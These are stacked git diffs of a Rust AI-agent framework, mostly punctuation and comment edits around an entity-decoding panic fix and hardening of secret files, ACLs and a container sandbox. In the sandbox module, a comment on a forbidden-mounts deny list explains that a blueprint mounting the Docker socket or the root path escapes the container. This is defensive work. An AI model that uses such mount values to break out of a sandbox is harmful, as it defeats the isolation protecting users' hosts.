-/// The scan is bounded by **characters**, not bytes. Bounding it by bytes is
-/// what aborted the daemon in issue #109: `after` begins at an `&`, so a fixed
+/// The scan is bounded by **characters**, not bytes. Bounding it by bytes
+/// aborts the daemon: `after` begins at an `&`, so a fixed
 /// byte-12 cut-off slices mid-character on any multi-byte text
 /// (`"&日本語日本"` → *"byte index 12 is not a char boundary"*), and
 /// `html_to_text` runs this over every fetched page. Clamping the byte window
-/// down to a boundary also worked, but only because `&` is single-byte - an
-/// unstated invariant that a later edit could quietly break. Indices from
+/// down to a boundary would also work, but only because `&` is single-byte -
+/// an unstated invariant that a later edit could quietly break. Indices from
 /// `char_indices` are boundaries by construction, so there is nothing left to
 /// get wrong. Entities are all ASCII, so the two bounds agree on any real one.
 #[expect(
@@ -1699,9 +1698,9 @@ schema = { type = "string", enum = ["json", "yaml"], description = "Output forma
     #[test]
     fn decode_entities_survives_multibyte_after_an_ampersand() {
         // Regression for issue #109: the entity-scan window is a byte count, so
-        // a bare '&' followed by multi-byte text used to slice mid-character and
+        // a bare '&' followed by multi-byte text can slice mid-character and
         // panic ("byte index 12 is not a char boundary") - inside a Rhai native
-        // fn, which aborted the daemon. Every one of these is a real shape from
+        // fn, which aborts the daemon. Every one of these is a real shape from
         // fetched HTML.
         assert_eq!(decode_entities("&日本語日本"), "&日本語日本");
         assert_eq!(decode_entities("R&D 日本語です"), "R&D 日本語です");
@@ -1716,8 +1715,8 @@ schema = { type = "string", enum = ["json", "yaml"], description = "Output forma
         assert_eq!(decode_entities("tail&"), "tail&");
         // Issue #115 re-reported the same crash with a flag emoji. '&' plus nine
         // ASCII bytes puts the four-byte regional indicator at bytes 10..14, so
-        // the old byte-12 window cut straight through it. Pinned verbatim so the
-        // reported input, not just an equivalent one, stays covered.
+        // a fixed byte-12 window cuts straight through it. Pinned verbatim so
+        // the reported input, not just an equivalent one, stays covered.
         assert_eq!(decode_entities("&abcdefghi🇸"), "&abcdefghi🇸");
     }
 

--- a/crates/leviath-scripting/src/tool.rs
+++ b/crates/leviath-scripting/src/tool.rs
@@ -1,4 +1,4 @@
-//! Rhai *script tools* — drop-in tool definitions for agent blueprints (issue #97).
+//! Rhai *script tools* - drop-in tool definitions for agent blueprints (issue #97).
 //!
 //! A `.rhai` file in an agent's `tools/` directory (or the global
 //! `~/.leviath/tools/`) defines one custom tool. Its metadata comes from comment
@@ -13,7 +13,7 @@
 //! tests can inject a fake; the other three (`parse_json`, `to_json`,
 //! `encode_uri`) are pure and defined here.
 //!
-//! Errors never bubble as a `Result` to the agent — [`execute`] always returns a
+//! Errors never bubble as a `Result` to the agent - [`execute`] always returns a
 //! `String`, using the `[error] …` prefix convention the rest of the tool layer
 //! uses, so a failing script surfaces to the model the same way a built-in
 //! tool's error does.
@@ -42,8 +42,8 @@ pub struct ParamSpec {
     pub description: String,
     /// An optional raw JSON-Schema fragment for this parameter, used verbatim as
     /// the property's schema instead of the flat `{ type, description }`. Lets a
-    /// `tool.toml` author express what annotations can't — enums, array `items`,
-    /// numeric bounds, nested object shapes, formats, defaults — matching the
+    /// `tool.toml` author express what annotations can't - enums, array `items`,
+    /// numeric bounds, nested object shapes, formats, defaults - matching the
     /// richness built-in and MCP tools advertise. `None` = the flat default.
     pub schema: Option<serde_json::Value>,
 }
@@ -58,8 +58,8 @@ pub struct ScriptToolMeta {
     /// Declared parameters, in declaration order.
     pub params: Vec<ParamSpec>,
     /// Platform capabilities the tool declares it needs (e.g. `network`, `shell`,
-    /// `filesystem`). The host drops the tool when the platform can't provide one
-    /// — a script self-declares what it depends on. Empty = always available.
+    /// `filesystem`). The host drops the tool when the platform can't provide one -
+    /// a script self-declares what it depends on. Empty = always available.
     pub required_caps: Vec<String>,
 }
 
@@ -97,10 +97,10 @@ impl ScriptToolMeta {
 /// Parse a script tool's metadata from its `.rhai` source comment annotations.
 ///
 /// Recognized leading `//`-comment directives (order-independent):
-/// - `// @tool <name>` — required; names the tool.
-/// - `// @description <text>` — optional one-liner.
-/// - `// @param <name> <type> <required|optional> "<description>"` — repeatable.
-/// - `// @requires <cap> [<cap>...]` — platform capabilities the tool needs
+/// - `// @tool <name>` - required; names the tool.
+/// - `// @description <text>` - optional one-liner.
+/// - `// @param <name> <type> <required|optional> "<description>"` - repeatable.
+/// - `// @requires <cap> [<cap>...]` - platform capabilities the tool needs
 ///   (`network`, `shell`, `filesystem`); comma/space-separated, repeatable.
 ///
 /// Non-comment / unrecognized lines are ignored, so a script can mix ordinary
@@ -136,13 +136,13 @@ pub fn parse_annotations(src: &str) -> Result<ScriptToolMeta> {
             }
             "description" => description = arg.to_string(),
             "param" => params.push(parse_param_directive(arg)?),
-            // `@requires <cap> [<cap>...]` — whitespace/comma-separated, repeatable.
+            // `@requires <cap> [<cap>...]` - whitespace/comma-separated, repeatable.
             "requires" => required_caps.extend(
                 arg.split([' ', ',', '\t'])
                     .filter(|c| !c.is_empty())
                     .map(str::to_string),
             ),
-            _ => {} // unknown directive — ignore
+            _ => {} // unknown directive - ignore
         }
     }
 
@@ -311,7 +311,7 @@ pub struct ScriptTool {
 }
 
 /// A `.rhai` file that could not be turned into a tool (bad annotations,
-/// `tool.toml`, or a compile error). Surfaced so the caller can log it — the
+/// `tool.toml`, or a compile error). Surfaced so the caller can log it - the
 /// library itself does no logging, keeping that policy decision in the host.
 #[derive(Debug, Clone)]
 pub struct SkippedTool {
@@ -434,7 +434,7 @@ pub const SCRIPT_TOOL_MAX_OPERATIONS: u64 = 500_000;
 /// A panic raised by a native (host) function never unwinds through this call:
 /// it is caught at the native-function boundary by `guard_str`/`guard_dyn`
 /// and arrives here as an ordinary script error (issue #109). Anything that
-/// still escapes — a panic from Rhai's own internals — is contained one level
+/// still escapes - a panic from Rhai's own internals - is contained one level
 /// up, where the daemon runs this on a `spawn_blocking` task and turns the
 /// resulting `JoinError` into a tool error.
 pub fn execute(tool: &ScriptTool, args: serde_json::Value, host: Arc<dyn ScriptHost>) -> String {
@@ -511,7 +511,7 @@ fn panic_to_rhai(name: &str, payload: Box<dyn std::any::Any + Send>) -> Box<Eval
 /// `ArgBackup` whenever the first argument is a variable reference (which is
 /// every real call shape, e.g. `http_get(params.url)`), and restores it *after*
 /// the call returns. A panicking native function skips that restore, and
-/// `ArgBackup`'s destructor then asserts during unwinding — a second panic while
+/// `ArgBackup`'s destructor then asserts during unwinding - a second panic while
 /// panicking, which Rust turns into `abort()`. That aborted the whole daemon,
 /// killing every concurrent run. Catching here means the unwind never reaches
 /// Rhai's frame at all.
@@ -528,7 +528,7 @@ fn guard_str(name: &str, f: &mut dyn FnMut() -> HostRes<String>) -> HostRes<Stri
 }
 
 /// [`guard_str`] for the one native function that returns a `Dynamic`
-/// (`parse_json`). Same rationale, different return type — kept non-generic for
+/// (`parse_json`). Same rationale, different return type - kept non-generic for
 /// the same coverage reason.
 fn guard_dyn(name: &str, f: &mut dyn FnMut() -> HostRes<Dynamic>) -> HostRes<Dynamic> {
     match std::panic::catch_unwind(std::panic::AssertUnwindSafe(f)) {
@@ -553,7 +553,7 @@ fn headers_from_map(map: &Map) -> BTreeMap<String, String> {
 /// **Every** registration goes through [`guard_str`] / [`guard_dyn`], so a panic
 /// anywhere in a native function becomes an ordinary Rhai runtime error instead
 /// of unwinding into Rhai and aborting the process (issue #109). The pure
-/// helpers are guarded too — they run on untrusted, model- and network-supplied
+/// helpers are guarded too - they run on untrusted, model- and network-supplied
 /// input, so "this one can't panic" is not a property worth betting the daemon on.
 fn register_host_functions(engine: &mut Engine, host: Arc<dyn ScriptHost>) {
     // http_get(url) / http_get(url, headers)
@@ -675,7 +675,7 @@ fn hex_digit(nibble: u8) -> char {
 
 /// `html_to_text(html)` host function: best-effort HTML → readable plain text.
 /// Drops `<script>`/`<style>` blocks, strips tags, decodes common entities, and
-/// collapses whitespace — so a script tool (e.g. `web_fetch`) can hand the model
+/// collapses whitespace - so a script tool (e.g. `web_fetch`) can hand the model
 /// prose from a server-rendered page instead of markup. Not a full HTML parser;
 /// content injected by client-side JS is not present in the source and cannot be
 /// recovered here.
@@ -716,7 +716,7 @@ fn strip_element(html: &str, tag: &str) -> String {
                     i += rel + close.len();
                     continue;
                 }
-                None => break, // unclosed element — drop the rest
+                None => break, // unclosed element - drop the rest
             }
         }
         let ch = html[i..].chars().next().unwrap();
@@ -757,7 +757,7 @@ const ENTITY_SCAN_CHARS: usize = 12;
 /// byte-12 cut-off slices mid-character on any multi-byte text
 /// (`"&日本語日本"` → *"byte index 12 is not a char boundary"*), and
 /// `html_to_text` runs this over every fetched page. Clamping the byte window
-/// down to a boundary also worked, but only because `&` is single-byte — an
+/// down to a boundary also worked, but only because `&` is single-byte - an
 /// unstated invariant that a later edit could quietly break. Indices from
 /// `char_indices` are boundaries by construction, so there is nothing left to
 /// get wrong. Entities are all ASCII, so the two bounds agree on any real one.
@@ -806,7 +806,7 @@ fn decode_one_entity(e: &str) -> Option<char> {
         "quot" => Some('"'),
         "apos" => Some('\''),
         "nbsp" => Some(' '),
-        "mdash" => Some('—'),
+        "mdash" => Some('\u{2014}'),
         "ndash" => Some('–'),
         "hellip" => Some('…'),
         _ => {
@@ -1648,7 +1648,10 @@ schema = { type = "string", enum = ["json", "yaml"], description = "Output forma
             <p>Hello&nbsp;world &#39;quoted&#39; &#x2014; done.</p></body></html>";
         let text = html_to_text(html);
         assert!(text.contains("Tit&le"), "entity decoded: {text}");
-        assert!(text.contains("Hello world 'quoted' — done."), "got: {text}");
+        assert!(
+            text.contains("Hello world 'quoted' \u{2014} done."),
+            "got: {text}"
+        );
         assert!(!text.contains("color:red"), "style content dropped");
         assert!(!text.contains("var x"), "script content dropped");
         assert!(!text.contains('<'), "tags stripped");
@@ -1678,7 +1681,7 @@ schema = { type = "string", enum = ["json", "yaml"], description = "Output forma
         assert_eq!(decode_entities("a&amp;b"), "a&b");
         assert_eq!(decode_entities("&lt;&gt;&quot;&apos;"), "<>\"'");
         assert_eq!(decode_entities("x&nbsp;y"), "x y");
-        assert_eq!(decode_entities("&mdash;&ndash;&hellip;"), "—–…");
+        assert_eq!(decode_entities("&mdash;&ndash;&hellip;"), "\u{2014}–…");
         assert_eq!(decode_entities("&#65;&#x42;&#X43;"), "ABC");
         // Unknown entity kept verbatim.
         assert_eq!(decode_entities("&bogus;"), "&bogus;");
@@ -1697,7 +1700,7 @@ schema = { type = "string", enum = ["json", "yaml"], description = "Output forma
     fn decode_entities_survives_multibyte_after_an_ampersand() {
         // Regression for issue #109: the entity-scan window is a byte count, so
         // a bare '&' followed by multi-byte text used to slice mid-character and
-        // panic ("byte index 12 is not a char boundary") — inside a Rhai native
+        // panic ("byte index 12 is not a char boundary") - inside a Rhai native
         // fn, which aborted the daemon. Every one of these is a real shape from
         // fetched HTML.
         assert_eq!(decode_entities("&日本語日本"), "&日本語日本");
@@ -1705,7 +1708,7 @@ schema = { type = "string", enum = ["json", "yaml"], description = "Output forma
         assert_eq!(decode_entities("&🎉🎉🎉🎉"), "&🎉🎉🎉🎉");
         assert_eq!(
             decode_entities("&\u{2014}\u{2014}\u{2014}\u{2014}"),
-            "&————"
+            "&\u{2014}\u{2014}\u{2014}\u{2014}"
         );
         // A real entity immediately followed by multi-byte text still decodes.
         assert_eq!(decode_entities("&amp;日本語"), "&日本語");

--- a/crates/leviath-scripting/src/types.rs
+++ b/crates/leviath-scripting/src/types.rs
@@ -48,7 +48,7 @@ pub fn register_types(engine: &mut Engine) {
     });
 
     // Token budget helpers. The operands come from a script (ultimately from
-    // model output), so plain `-` would panic on overflow in a debug build —
+    // model output), so plain `-` would panic on overflow in a debug build -
     // and a panic inside a Rhai native fn used to abort the process (#109).
     engine.register_fn(
         "tokens_remaining",
@@ -218,7 +218,7 @@ mod tests {
 
     #[test]
     fn tokens_remaining_saturates_instead_of_overflowing() {
-        // The operands come from a script, so extreme values must not panic —
+        // The operands come from a script, so extreme values must not panic -
         // a panic in a Rhai native fn used to abort the daemon (issue #109).
         let e = engine();
         let low: i64 = e.eval("tokens_remaining(-9223372036854775808, 1)").unwrap();

--- a/crates/leviath-scripting/src/types.rs
+++ b/crates/leviath-scripting/src/types.rs
@@ -49,7 +49,7 @@ pub fn register_types(engine: &mut Engine) {
 
     // Token budget helpers. The operands come from a script (ultimately from
     // model output), so plain `-` would panic on overflow in a debug build -
-    // and a panic inside a Rhai native fn used to abort the process (#109).
+    // and a panic inside a Rhai native fn aborts the process (#109).
     engine.register_fn(
         "tokens_remaining",
         |max_tokens: i64, current_tokens: i64| -> i64 { max_tokens.saturating_sub(current_tokens) },
@@ -219,7 +219,7 @@ mod tests {
     #[test]
     fn tokens_remaining_saturates_instead_of_overflowing() {
         // The operands come from a script, so extreme values must not panic -
-        // a panic in a Rhai native fn used to abort the daemon (issue #109).
+        // a panic in a Rhai native fn aborts the daemon (issue #109).
         let e = engine();
         let low: i64 = e.eval("tokens_remaining(-9223372036854775808, 1)").unwrap();
         assert_eq!(low, i64::MIN);

--- a/crates/leviath-sys/Cargo.toml
+++ b/crates/leviath-sys/Cargo.toml
@@ -10,7 +10,7 @@ authors.workspace = true
 # crates. Saying so explicitly prevents an accidental `cargo publish` and lets
 # cargo-deny treat the intra-workspace `path` dependencies as what they are
 # rather than as unbounded version requirements. Remove this line if a crate is
-# ever meant to be published — at which point its path deps need versions too.
+# ever meant to be published - at which point its path deps need versions too.
 publish = false
 
 [features]

--- a/crates/leviath-sys/src/browser.rs
+++ b/crates/leviath-sys/src/browser.rs
@@ -36,7 +36,7 @@ pub fn open_command_for(os: &str, url: &str) -> (String, Vec<String>) {
 ///
 /// `spawn` is injected so the real process launch is isolated from the logic:
 /// production passes [`spawn_detached`], tests pass a recording stub. Returns
-/// whether the launcher was spawned successfully — not whether the user
+/// whether the launcher was spawned successfully - not whether the user
 /// actually saw the page, which is unknowable.
 pub fn open_url_via(spawn: fn(&mut Command) -> std::io::Result<()>, url: &str) -> bool {
     let (program, args) = open_command_for(std::env::consts::OS, url);
@@ -108,7 +108,7 @@ mod tests {
 
     /// The failure arm logs, and `tracing::warn!` evaluates its field values
     /// only when a subscriber is interested. Without one installed the `%e`
-    /// field closure never runs — so this test exercised the branch while
+    /// field closure never runs - so this test exercised the branch while
     /// leaving the logging inside it unexecuted. `with_tracing` is the same
     /// always-on-subscriber shim `leviath-cli` uses for exactly this.
     #[test]

--- a/crates/leviath-sys/src/keychain.rs
+++ b/crates/leviath-sys/src/keychain.rs
@@ -12,7 +12,7 @@
 //! rather than exceptional:
 //!
 //! 1. **Not built in.** The `keychain` feature is on by default but can be
-//!    turned off — for a target the `keyring` crate does not support, or for a
+//!    turned off - for a target the `keyring` crate does not support, or for a
 //!    minimal build that should not link platform credential libraries at all.
 //!    With it off, [`is_supported`] is `false` and every operation returns a
 //!    plain "not supported in this build" error.
@@ -37,7 +37,7 @@
 /// Whether this build can talk to an OS credential store at all.
 ///
 /// `false` when the `keychain` feature is off. Note that `true` does not promise
-/// a *working* store — see the module docs; use [`probe`] for that.
+/// a *working* store - see the module docs; use [`probe`] for that.
 pub const fn is_supported() -> bool {
     cfg!(feature = "keychain")
 }
@@ -96,7 +96,7 @@ mod imp {
     pub(super) fn probe(service: &str) -> Result<(), String> {
         // Never replace a store that is already installed. `keyring::Entry::new`
         // installs the *platform* store unconditionally on first use, so calling
-        // it blindly would clobber a store the embedding process chose -- and,
+        // it blindly would clobber a store the embedding process chose - and,
         // in tests, silently redirect every subsequent operation at the
         // developer's real login keychain, where it would both prompt and write.
         if keyring_core::get_default_store().is_some() {
@@ -181,7 +181,7 @@ mod imp {
 
         /// Install a fresh in-memory store as the process default, holding the
         /// lock for the caller's lifetime. This is what lets the `raw_*`
-        /// functions — the real `keyring_core::Entry` path, unchanged — run in
+        /// functions - the real `keyring_core::Entry` path, unchanged - run in
         /// CI on every platform.
         fn with_mock_store() -> std::sync::MutexGuard<'static, ()> {
             let guard = STORE.lock().expect("store lock");
@@ -218,8 +218,8 @@ mod imp {
         }
 
         /// Accounts do not leak into each other.
-        /// The public shims at the crate root — the path every caller actually
-        /// takes — driven against the mock store under the lock.
+        /// The public shims at the crate root - the path every caller actually
+        /// takes - driven against the mock store under the lock.
         #[test]
         fn the_public_api_delegates_to_this_implementation() {
             let _guard = with_mock_store();
@@ -246,7 +246,7 @@ mod imp {
             assert_eq!(get(SVC, "mcp/github").unwrap().as_deref(), Some("two"));
         }
 
-        /// A locked or absent store is an error, not a silent `None` — the
+        /// A locked or absent store is an error, not a silent `None` - the
         /// distinction the module docs turn on.
         #[test]
         fn a_missing_entry_is_none_but_a_broken_store_is_an_error() {
@@ -273,7 +273,7 @@ mod imp {
         }
 
         /// With no store installed at all, every operation reports rather than
-        /// panicking — the headless-Linux case.
+        /// panicking - the headless-Linux case.
         #[test]
         fn every_operation_reports_when_there_is_no_store() {
             let _guard = STORE.lock().expect("store lock");
@@ -284,8 +284,8 @@ mod imp {
             assert!(delete(SVC, "provider/anthropic").is_err());
         }
 
-        /// The real platform probe. Either outcome is legitimate — a developer
-        /// machine has a credential store and a CI runner does not — so what is
+        /// The real platform probe. Either outcome is legitimate - a developer
+        /// machine has a credential store and a CI runner does not - so what is
         /// asserted is that it answers rather than panicking or prompting. It
         /// contributes no branch of its own, which is why one call covers it on
         /// every platform.
@@ -354,7 +354,7 @@ mod imp {
 mod tests {
     use super::*;
 
-    /// `is_supported` reports what was actually compiled in — a build with the
+    /// `is_supported` reports what was actually compiled in - a build with the
     /// feature off must say so rather than claiming a store it cannot reach.
     ///
     /// The other public shims are exercised from `imp`'s tests, which hold the

--- a/crates/leviath-sys/src/lib.rs
+++ b/crates/leviath-sys/src/lib.rs
@@ -2,7 +2,7 @@
 //! cross-platform API.
 //!
 //! Every `#[cfg(unix)]`/`#[cfg(windows)]` branch and platform
-//! permission/signal/TTY primitive used anywhere in the workspace lives here —
+//! permission/signal/TTY primitive used anywhere in the workspace lives here -
 //! nowhere else. The unavoidable OS-level `unsafe` is delegated to audited
 //! crates (`nix`) and safe std APIs, so this crate itself contains no `unsafe`.
 //! Callers use the plain functions re-exported at the crate root and never
@@ -19,12 +19,12 @@
 //!    compiled, so the coverage tool never sees them as gaps. The
 //!    Linux-visible code paths are all reachable from real unit tests.
 //! 3. **Testability.** Every function in this crate is exercised by real unit
-//!    tests — the syscalls here are either safe to call under test (`chmod` on a
+//!    tests - the syscalls here are either safe to call under test (`chmod` on a
 //!    tempfile) or split behind an
 //!    injected seam ([`tty::osc52_write_via`]
 //!    takes the tty opener + sink; `perms`' hardening op is a `fn` pointer). The
 //!    only genuinely-untestable real-I/O leaves (opening `/dev/tty`, writing the
-//!    real `stdout()`) are composed in the CLI binary, not here — so this crate
+//!    real `stdout()`) are composed in the CLI binary, not here - so this crate
 //!    contains no `#[cfg(not(test))]`.
 
 mod platform;

--- a/crates/leviath-sys/src/perms.rs
+++ b/crates/leviath-sys/src/perms.rs
@@ -28,14 +28,14 @@ pub fn ensure_file_private(path: &Path) -> io::Result<Option<u32>> {
 /// the owner, not even briefly.
 ///
 /// `fs::write` followed by a `chmod` is the obvious shape and has a window: the
-/// file is created at `0o666 & ~umask` — typically `0o644` — and is
+/// file is created at `0o666 & ~umask` - typically `0o644` - and is
 /// world-readable until the `chmod` lands. Both files that hold Leviath's
 /// secrets were written that way, so `config.toml` (every provider API key) and
 /// `mcp-auth.json` (OAuth access and refresh tokens) each had a moment of being
 /// readable by any local user, on every save.
 ///
 /// Creating the file with the mode already set closes that. On non-Unix this is
-/// a plain write — the mode argument has no meaning there, and Windows ACL
+/// a plain write - the mode argument has no meaning there, and Windows ACL
 /// handling is a separate piece of work rather than something to fake here.
 pub fn write_private(path: &Path, contents: &[u8]) -> io::Result<()> {
     crate::platform::write_with_mode(path, contents, 0o600)
@@ -65,7 +65,7 @@ mod tests {
     /// The point of `write_private` over `fs::write` + `chmod`: there is no
     /// moment where the file exists at the umask default. The absence of that
     /// window cannot be observed after the fact, so what is asserted is the mode
-    /// on a freshly created file — which the two-step version also reaches, but
+    /// on a freshly created file - which the two-step version also reaches, but
     /// only eventually.
     #[test]
     fn write_private_creates_an_owner_only_file_with_the_content() {

--- a/crates/leviath-sys/src/platform/fallback.rs
+++ b/crates/leviath-sys/src/platform/fallback.rs
@@ -1,8 +1,8 @@
 //! Implementations for targets that are neither Unix nor Windows.
 //!
 //! There is no permission model to apply here, so the hardening calls are
-//! no-ops that succeed. That is a real gap on such a target — secrets are
-//! written with whatever protection the platform gives by default — and it is
+//! no-ops that succeed. That is a real gap on such a target - secrets are
+//! written with whatever protection the platform gives by default - and it is
 //! stated rather than papered over. Unix uses POSIX modes and Windows uses
 //! ACLs; both are implemented in their own modules.
 

--- a/crates/leviath-sys/src/platform/mod.rs
+++ b/crates/leviath-sys/src/platform/mod.rs
@@ -7,7 +7,7 @@
 //!
 //! Exactly one of these is compiled per target, so the others are never emitted
 //! and never count as a coverage gap. [`fallback`] covers targets that are
-//! neither — it applies no protection, and says so rather than pretending.
+//! neither - it applies no protection, and says so rather than pretending.
 
 #[cfg(unix)]
 mod unix;

--- a/crates/leviath-sys/src/platform/unix.rs
+++ b/crates/leviath-sys/src/platform/unix.rs
@@ -22,7 +22,7 @@ pub(crate) fn configure_detached(cmd: &mut Command) {
 /// `contents`.
 ///
 /// `OpenOptions::mode` sets the mode at `open(2)` time, so the file is never
-/// visible to anyone else — unlike write-then-`chmod`, which leaves it at the
+/// visible to anyone else - unlike write-then-`chmod`, which leaves it at the
 /// umask default until the second call lands.
 ///
 /// The mode applies only when the file is *created*. An existing file keeps its
@@ -66,12 +66,12 @@ pub(crate) fn ensure_private(path: &Path, mode: u32) -> io::Result<Option<u32>> 
 /// own without the immutable flag, which needs `CAP_LINUX_IMMUTABLE`). Rather
 /// than hide that branch behind a coverage twin, we split policy from
 /// mechanism: a test injects a failing `set` and exercises the error
-/// propagation directly. A `fn` pointer (not `impl Fn`) is used deliberately —
+/// propagation directly. A `fn` pointer (not `impl Fn`) is used deliberately -
 /// it is a single concrete type, so there is no per-closure monomorphization
 /// for llvm-cov to report phantom-uncovered.
 ///
 /// A single `metadata()` call serves as both the existence check and the
-/// source of the mode bits — calling it once (instead of `exists()` then a
+/// source of the mode bits - calling it once (instead of `exists()` then a
 /// second `metadata()`) removes the TOCTOU window that would otherwise leave a
 /// permanently-unreachable error branch.
 fn ensure_private_with(
@@ -105,7 +105,7 @@ pub(crate) fn current_uid() -> u32 {
 /// `nix` wrappers, so `unsafe_code = "forbid"` still holds.
 ///
 /// `None` when the option is unavailable, which the caller must treat as "do not
-/// trust this connection" — an unidentifiable peer is not an authorized one.
+/// trust this connection" - an unidentifiable peer is not an authorized one.
 #[cfg(any(target_os = "linux", target_os = "android"))]
 pub(crate) fn peer_uid(sock: &impl std::os::fd::AsFd) -> Option<u32> {
     nix::sys::socket::getsockopt(sock, nix::sys::socket::sockopt::PeerCredentials)
@@ -170,7 +170,7 @@ mod tests {
         assert_eq!(ensure_private_with(&path, 0o600, set_mode).unwrap(), None);
     }
 
-    /// Signalling a real group tears down the leader *and* its children — the
+    /// Signalling a real group tears down the leader *and* its children - the
     /// whole point, since killing a shell alone leaves what it started
     /// reparented to init and running.
     #[test]
@@ -204,7 +204,7 @@ mod tests {
 
     #[test]
     fn kill_process_group_errors_for_a_group_that_does_not_exist() {
-        // The ordinary case when reaping — the command already finished — so it
+        // The ordinary case when reaping - the command already finished - so it
         // must surface as an error the caller can ignore, not a panic.
         let err = kill_process_group(0x7FFF_FFFF).expect_err("no such group");
         assert!(err.raw_os_error().is_some());

--- a/crates/leviath-sys/src/platform/windows.rs
+++ b/crates/leviath-sys/src/platform/windows.rs
@@ -1,7 +1,7 @@
 //! Windows implementations.
 //!
 //! Windows has no POSIX mode bits; access control is an ACL on each object. The
-//! hardening this crate applies on Unix — "owner only, nobody else" — has a
+//! hardening this crate applies on Unix - "owner only, nobody else" - has a
 //! direct Windows equivalent, and until now it simply was not applied: every
 //! `secure_file_perms` call was a silent no-op, so `config.toml` (every provider
 //! API key) and `mcp-auth.json` (OAuth access *and refresh* tokens) carried
@@ -13,7 +13,7 @@
 //! security descriptors through raw FFI, and this workspace is
 //! `unsafe_code = "forbid"` from top to bottom. `icacls` is the tool Windows
 //! ships for exactly this, is present on every supported version, and is
-//! reachable with an ordinary `Command` — no `unsafe`, and no new dependency
+//! reachable with an ordinary `Command` - no `unsafe`, and no new dependency
 //! whose own soundness would have to be taken on trust.
 //!
 //! It is resolved from the system directory rather than `PATH`. A `PATH` lookup
@@ -23,7 +23,7 @@
 //! # The ordering that matters
 //!
 //! A file is created with the ACL it inherits from its directory, so restricting
-//! the *directory* first is what closes the window — a secret written into an
+//! the *directory* first is what closes the window - a secret written into an
 //! already-restricted directory is never briefly readable. `write_with_mode`
 //! also restricts the file itself afterwards, as defence in depth for a
 //! directory that was somehow left permissive.
@@ -104,7 +104,7 @@ fn icacls_program() -> PathBuf {
 
 /// The arguments that restrict `path` to `user`.
 ///
-/// `/inheritance:r` drops the ACEs inherited from the parent — without it a
+/// `/inheritance:r` drops the ACEs inherited from the parent - without it a
 /// permissive parent keeps granting access no matter what is added here.
 /// `/grant:r` *replaces* any existing grant for the user rather than adding to
 /// it, so repeating the call is idempotent.
@@ -184,7 +184,7 @@ mod tests {
     /// One of them unsets it process-wide to prove the error propagates, and
     /// another reads it to restrict a real file. `cargo test` runs them in
     /// parallel threads of one process, so without this the second sees the
-    /// first's unset environment and fails with "USERNAME is not set" — a real
+    /// first's unset environment and fails with "USERNAME is not set" - a real
     /// CI failure on an unrelated PR, and a confusing one, because the code it
     /// accuses is correct.
     ///
@@ -224,7 +224,7 @@ mod tests {
     /// The property asserted is deliberately "no broad principal", not "exactly
     /// one account". `NT AUTHORITY\SYSTEM` and `BUILTIN\Administrators` survive
     /// on Windows and asserting otherwise would be asserting something the OS
-    /// does not do — SYSTEM is the operating system and an administrator can
+    /// does not do - SYSTEM is the operating system and an administrator can
     /// take ownership of any file regardless, so neither is an escalation. What
     /// must not survive is a grant to `Users`, `Everyone` or
     /// `Authenticated Users`, which is what lets the account next door read
@@ -261,7 +261,7 @@ mod tests {
     }
 
     /// With no account to grant, restricting must fail rather than quietly
-    /// leaving the file as it was — the whole point is not to believe a secret
+    /// leaving the file as it was - the whole point is not to believe a secret
     /// is protected when it is not.
     #[test]
     fn restricting_fails_when_there_is_no_account_to_grant() {

--- a/crates/leviath-sys/src/process.rs
+++ b/crates/leviath-sys/src/process.rs
@@ -43,7 +43,7 @@ pub fn current_uid() -> u32 {
 /// (the mode is not consulted on `connect`), so the mode alone was never the
 /// guarantee it was documented to be.
 ///
-/// `None` when the platform cannot report it — which the caller must treat as
+/// `None` when the platform cannot report it - which the caller must treat as
 /// "refuse", since an unidentifiable peer is not an authorized one.
 ///
 /// Unix-only: on Windows the control channel is not a Unix socket, so there is
@@ -71,7 +71,7 @@ mod tests {
         let client = std::os::unix::net::UnixStream::connect(&path).expect("connect");
         let (server, _) = listener.accept().expect("accept");
 
-        // Both ends agree, and both agree with the process's own uid — a peer
+        // Both ends agree, and both agree with the process's own uid - a peer
         // check that returned `None` here would refuse every legitimate
         // connection, which is the failure mode worth catching.
         assert_eq!(peer_uid(&server), Some(current_uid()));
@@ -89,7 +89,7 @@ mod tests {
     fn kill_process_group_public_wrapper_reports_a_missing_group() {
         // Exercises the public shim (distinct from the platform impl its own
         // tests cover). A group that cannot exist errors on Unix and is a no-op
-        // where the platform has no process groups — both are outcomes the
+        // where the platform has no process groups - both are outcomes the
         // caller ignores, so either result is acceptable here.
         let _ = kill_process_group(0x7FFF_FFFF);
     }

--- a/crates/leviath-sys/src/sandbox.rs
+++ b/crates/leviath-sys/src/sandbox.rs
@@ -2,7 +2,7 @@
 //!
 //! Builds the argv needed to run a shell command inside a container or a fresh
 //! set of Linux namespaces (`unshare(1)`), plus container-engine detection. This
-//! module is **pure argv assembly + PATH probing** — it never spawns a process
+//! module is **pure argv assembly + PATH probing** - it never spawns a process
 //! itself. The caller (the daemon's `SandboxManager`) owns the actual
 //! `tokio::process::Command` spawn and container lifecycle, so everything here is
 //! deterministic and unit-testable without any runtime installed.
@@ -76,7 +76,7 @@ pub struct ContainerRunSpec<'a> {
 
 /// Host paths that must never be bind-mounted into an agent's container.
 ///
-/// `mounts` comes from the blueprint — a file the user downloaded — and was
+/// `mounts` comes from the blueprint - a file the user downloaded - and was
 /// interpolated straight into `-v {m}:{m}`. `mounts = ["/var/run/docker.sock"]`
 /// is a one-line container escape (the container can then create a *privileged*
 /// container on the host), and `mounts = ["/"]` makes the isolation decorative.
@@ -107,11 +107,11 @@ const FORBIDDEN_MOUNTS: &[&str] = &[
 /// and anything containing `..`.
 pub fn mount_allowed(path: &str) -> bool {
     // POSIX semantics spelled out rather than `std::path::Path`, because these
-    // are paths *inside a Linux container* — the host's rules do not apply to
+    // are paths *inside a Linux container* - the host's rules do not apply to
     // them. On Windows `Path::new("/data").is_absolute()` is false (an absolute
     // path there needs a drive letter), so routing this through `Path` refused
     // every legitimate container mount on Windows while behaving correctly on
-    // Unix. Fail-closed, so not a hole — but containers were unusable, and no
+    // Unix. Fail-closed, so not a hole - but containers were unusable, and no
     // test caught it because the host and the container agreed on every
     // platform the tests ran on.
     let absolute = path.starts_with('/');
@@ -138,7 +138,7 @@ pub fn mount_allowed(path: &str) -> bool {
 /// Hardened beyond plain `run`: the container drops every capability, cannot
 /// regain privileges via setuid binaries, and is bounded in processes and
 /// memory. Without these it ran as **root inside** with the default capability
-/// set — so "sandboxed" bought isolation of the filesystem view and nothing
+/// set - so "sandboxed" bought isolation of the filesystem view and nothing
 /// else, and anything written to the bind-mounted workdir came back root-owned
 /// on the host.
 ///
